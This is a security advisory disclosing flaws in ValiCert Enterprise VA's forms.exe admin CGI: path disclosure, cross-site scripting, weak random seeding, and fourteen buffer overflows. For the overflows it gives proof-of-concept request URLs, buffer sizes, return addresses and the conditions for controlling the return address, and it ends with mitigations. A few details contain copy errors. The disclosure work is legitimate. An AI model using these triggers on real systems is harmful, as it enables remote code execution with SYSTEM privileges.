|
|
|
|
| |
ValiCert Enterprise VA provides validity status responses for X.509 certificates and supports the following verification mechanisms:
- Certificate Revocation Lists
- CRL Distribution Points
- Online Certificate Status Protocol
The Enterprise VA product architecture consists of:
* Enterprise VA Administration Server for performing management activities
* Enterprise VA Host Server for processing validation requests VA API defining custom extensions to Enterprise VA.
Numerous vulnerabilities have been located in a CGI script used by the Enterprise VA Administration Server ranging from information gathering to system compromise. |
| |
Credit:
The information has been provided by Information Anarchy 2K01.
|
| |
Vulnerable systems:
ValiCert Enterprise VA v3.3 - 4.2.1
Issue #1 - Path disclosure
A path disclosure issue exists in the forms.exe CGI script used by ValiCert when a new extension is added. ValiCert can be extended by adding new extensions that are processed by custom policies. The following URL adds the extension, ldp:
http://computer:13333/cgi-bin/forms.exe?extension=ldp&command=Add+Extension
When an invalid extension, such as foobar, is provided in the following URL:
http://computer:13333/cgi-bin/forms.exe?extension=foobar&command=Add+Extension
The server returns an error page with the following text:
Following Input/Configuration file is NOT FOUND in the required location.
FILENAME = foobar
LOCATION = D:\Program Files\ValiCert\EnterpriseVA\entserv
Make sure the file is present in the above location and try again.
Revealing the path to the ValiCert installation.
Issue #2 - Cross-site scripting problem
Due to the lack of input validation and filtering, a cross-site scripting issue exists in the certificate creation of the ValiCert Administrative interface. A user creating a certificate can insert HTML code into the descriptive fields. If the certificate is viewed through the ValiCert Administrative server, the HTML is interpreted and any scripting is executed. As an example, HTML code can be inserted into the organizational name that is interpreted upon certificate display. In doing so, an attacker can display a dialog box prompting the operator to enter a password. Though it is not possible to access unauthorized resources, it could be used to socially engineer an individual administering the ValiCert server into entering sensitive data.
If the Administrative server is protected with a password, only those individuals with the proper username/password can create such a certificate containing malicious data in the fields.
Issue #3 - Random key generation
ValiCert generates 'random' tokens for communication with Hardware Security Modules (securely stores digital certificates) using the C rand() function call. Furthermore, the C rand() function is seeded using local system time. Aside from the fact that the value is in itself predictable, system clock ticks are generally not finite enough to be used as a good, sole source of entropy. Seeding using local system time will guarantee that the values outputted will linearly increase.
Finally, if the '/dev/urandom' device exists, ValiCert will use it by default for certificate generation. Although for most purposes the '/dev/urandom' device is sufficiently safe, it does not perform blocking when its entropy pool is low. Taking into consideration that within a PKI, non-repudiation (in the business, not the mathematical sense) is paramount, the behavior of the '/dev/random' device is much more favorable.
Issue #4 - Multiple buffer overflows
Multiple buffer overflows exist in the CGI script, forms.exe, which is used by the ValiCert Enterprise VA Administration Server for management activities. By default, the Administration Server listens on TCP port 13333 and can be configured to require a username and password for access. Using the Apache v1.3.6 web server for Win32, the Administration Server allows an operator to use a Web browser to:
configure the Enterprise VA Host server
start/stop the Enterprise VA Host server
request product keys and licenses
create key pairs
add certificates
add or modify certificate stores
add and configure extensions
view logs
In total, fourteen (14) independent and exploitable overflows in parameters to forms.exe have been identified which allow code to be executed with SYSTEM privileges. If the Administrative Server has been configured to require a username and password for access, the attacker requires the correct username and password to launch these attacks.
Mode overflow:
The following URL is used to switch to server configuration mode,
http://localhost:13333/cgi-bin/forms.exe?command=change_index_mode&mode=config
Providing a mode string of 265 bytes overflows a buffer during a copy located at 0x0040acf8 in forms.exe and overwrites the return address that is popped off the stack at the subroutine return located at 0x0040adf9.
http://localhost:13333/cgi-bin/forms.exe?forms.exe?command=change_index_mode&mode={A x 265}
Analysis of the code and stack contents reveals that the unchecked buffer is 256 bytes long, followed by two pointers or 32-bit integers on the stack and then the return address.
Certificate_File overflow:
The following URL is used to create a Microsoft-type certificate.
Providing a Certificate_Files parameter of 1028 bytes overflows a buffer during a copy located at 0x0040599a in forms.exe and overwrites the return address that is popped off the stack at the subroutine return located at 0x00405cb8.
http://localhost:13333/cgi-bin/forms.exe?CertServerSelection
=Microsoft&Certificate_Type=SHARE&Certificate_Files
={A x 1028}&command=Submit+Certificate+Type
(URL is line wrapped)
Analysis of the code and stack contents reveals that the unchecked buffer is 1024 bytes long, immediately followed by the return address on the stack.
useExpiredCRLs overflow:
The following URL is used to reconfigure the ValiCert server that responds to validation requests.
Providing the useExpiredCRLs parameter a value of 1288 bytes overflows a buffer during a copy located at 0x0040b9dc in forms.exe and overwrites the return address that is popped off the stack at the subroutine return located at 0x0040bb17.
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs={A x 1288}&maxOCSPValidityPeriod
=0&command=Submit+Configuration+Parameters
(URL is line wrapped)
Analysis of the code and stack contents reveals that the unchecked buffer is 1284 bytes long, immediately followed by the return address on the stack.
listenLength overflow:
The following URL is used to reconfigure the ValiCert server that responds to validation requests.
Providing the listenLength parameter a value of 1288 bytes overflows a buffer during a copy located at 0x0040b54e in forms.exe and overwrites the return address that is popped off the stack at the subroutine return located at 0x0040bb17.
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength={A x 1288}&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters
(URL is line wrapped)
Analysis of the code and stack contents reveals that the unchecked buffer is 1284 bytes long, immediately followed by the return address on the stack.
maxThread overflow:
The following URL is used to reconfigure the ValiCert server that responds to validation requests.
Providing the maxThread parameter a value of 1288 bytes overflows a buffer during a copy located at 0x0040b5f3 in forms.exe and overwrites the return address that is popped off the stack at the subroutine return located at 0x0040bb17.
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread={A x 1288}&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters
(URL is line wrapped)
Analysis of the code and stack contents reveals that the unchecked buffer is 1284 bytes long, immediately followed by the return address on the stack.
maxConnPerSite overflow:
The following URL is used to reconfigure the ValiCert server that responds to validation requests.
Providing the maxConnPerSite parameter a value of 1288 bytes overflows a buffer during a copy located at 0x0040b67f in forms.exe and overwrites the return address that is popped off the stack at the subroutine return located at 0x0040bb17.
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite={A x 1288}&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters
(URL is line wrapped)
Analysis of the code and stack contents reveals that the unchecked buffer is 1284 bytes long, immediately followed by the return address on the stack.
maxMsgLen overflow:
The following URL is used to reconfigure the ValiCert server that responds to validation requests.
Providing the maxMsgLen parameter a value of 1288 bytes overflows a buffer during a copy located at 0x0040b70b in forms.exe and overwrites the return address that is popped off the stack at the subroutine return located at 0x0040bb17.
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
={A x 1288}&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters
(URL is line wrapped)
Analysis of the code and stack contents reveals that the unchecked buffer is 1284 bytes long, immediately followed by the return address on the stack.
exitTime overflow:
The following URL is used to reconfigure the ValiCert server that responds to validation requests.
Providing the exitTime parameter a value of 1288 bytes overflows a buffer during a copy located at 0x0040b797 in forms.exe and overwrites the return address that is popped off the stack at the subroutine return located at 0x0040bb17.
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime={A x 1288}&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters
(URL is line wrapped)
Analysis of the code and stack contents reveals that the unchecked buffer is 1284 bytes long, immediately followed by the return address on the stack.
blockTime overflow:
The following URL is used to reconfigure the ValiCert server that responds to validation requests.
Providing the blockTime parameter a value of 1288 bytes overflows a buffer during a copy located at 0x0040b823 in forms.exe and overwrites the return address that is popped off the stack at the subroutine return located at 0x0040bb17.
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime={A x 1288}&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters
(URL is line wrapped)
Analysis of the code and stack contents reveals that the unchecked buffer is 1284 bytes long, immediately followed by the return address on the stack.
nextUpdatePeriod overflow:
The following URL is used to reconfigure the ValiCert server that responds to validation requests.
Providing the blockTime parameter a value of 1288 bytes overflows a buffer during a copy located at 0x0040b8af in forms.exe and overwrites the return address that is popped off the stack at the subroutine return located at 0x0040bb17.
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod={A x 1288}&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters
(URL is line wrapped)
Analysis of the code and stack contents reveals that the unchecked buffer is 1284 bytes long, immediately followed by the return address on the stack.
buildLocal overflow:
The following URL is used to reconfigure the ValiCert server that responds to validation requests.
Providing the buildLocal parameter a value of 1288 bytes overflows a buffer during a copy located at 0x0040b950 in forms.exe and overwrites the return address that is popped off the stack at the subroutine return located at 0x0040bb17.
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal={A x 1288}&useSoftwareSigning
=Software&sslSigningType=Software&sslServerHost=&sslCertFile
=sslCert.cert&sslPrivateKey=ssl.privkey&useExpiredCRLs
=0&maxOCSPValidityPeriod=0&command=Submit+Configuration+Parameters
(URL is line wrapped)
Analysis of the code and stack contents reveals that the unchecked buffer is 1284 bytes long, immediately followed by the return address on the stack.
maxOCSPValidityPeriod overflow:
The following URL is used to reconfigure the ValiCert server that responds to validation requests.
Providing the maxOCSPValidityPeriod parameter a value of 1288 bytes overflows a buffer during a copy located at 0x0040ba68 in forms.exe and overwrites the return address that is popped off the stack at the subroutine return located at 0x0040bb17.
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod={A x 1288}&command
=Submit+Configuration+Parameters
(URL is line wrapped)
Analysis of the code and stack contents reveals that the unchecked buffer is 1284 bytes long, immediately followed by the return address on the stack.
extension overflows:
ValiCert can be extended by adding new extensions that are processed by custom policies. Attempting to add an extension with a file name of 995 bytes in length overflows a buffer at a sprintf located at 0x00417A9B in forms.exe while the error message to be displayed to the client is constructed. The long string overwrites the return address that is popped off the stack at the subroutine return located at 0x00417AD0.
http://localhost:13333/cgi-bin/forms.exe?extension={A x 995}&command=Add+Extension
Analysis of the code and stack contents reveals that the subroutine starting at 0x0040FEC0 makes many unchecked copies while converting the extension parameter to an absolute filename (i.e. D:\Program Files\ValiCert\EnterpriseVA\entserv\AAA..) and checking for existence, etc. During the course of these copies, terminating null's in (assumed) fixed-length buffers containing the filename are overwritten. As a result, the absolute filename passed to the offending sprintf call is much longer than expected. A solution to the sprintf problem will still leave the overflows in 0x0040FEC0, which may possible be exploited.
Private key generation overflow:
The operator can use the Administrative Server to generate new private keys for SSL communications or use in signing OCSP responses. An overflow exists in the processing of requests for the generation of private keys. The following is one example of how this overflow can be triggered by requesting a new private key for SSL communications. Long strings in all other parameter values other than the:
country_name
gen_self_signed_cert
command
keytype
Parameters will also trigger the overflow and overwrite a return address on the stack. The following URL overwrites the return address with the opt_company_name value (xxxx).
http://localhost:13333/cgi-bin/forms.exe?country_name=XX&state_name
=XX&locality_name=XX&org_name=XX&org_unit_name=X&common_name=X&email_address
=X@X&challenge_password={A x 833}&opt_company_name=xxxx&gen_self_signed_cert
=1&command=Submit+SW+Certificate+Request&keytype=BASIC%3BKEY_1
(URL is line wrapped)
Analysis of the code and stack contents reveals that the parameters:
country_name
state_name
locality_name
org_name
org_unit_name
common_name
email_address
challenge_password
opt_company_name
Are parsed and then reformatted using a sprintf statement called at 0x402C2E8. The destination buffer is too small to contain the results and overflows, overwriting the return address with the value in the opt_company_name parameter. The corrupted return address is popped off the stack at 0x0040C58A. The following set of constraints must be met for the overflow to occur:
a) The country_name parameter must be exactly two bytes long otherwise, the offending sprintf call is never reached.
b) The email_address parameter must be of the form string@string otherwise the offending sprintf call is never reached.
c) The total length of all parameters must be 864 bytes for the result from sprintf to overwrite the return address. Longer lengths will cause the buffer overflow but will also overwrite parameters passed to the subroutine, causing the CGI script to crash before the subroutine terminates and pops off the corrupted return address.
Vendor response:
ValiCert provided NMRC with their own advisory listing mitigation and fix information but also informed NMRC that their advisory contains ValiCert Inc. confidential and proprietary information. Based on this it is unclear what information can be provided as a vendor response and all customers of ValiCert are urged to contact support@valicert.com for more information.
NMRC suggested solution:
NMRC offers the following suggestions to prevent these vulnerabilities from being exploited:
If remote web administration is required, do so over an SSL connection to prevent the admin user id and password from being captured. Otherwise, blocking TCP port 13333, which is used for remote admin would prevent the overflows from being successful.
|
|
|
|
|
|
|
|
|
|
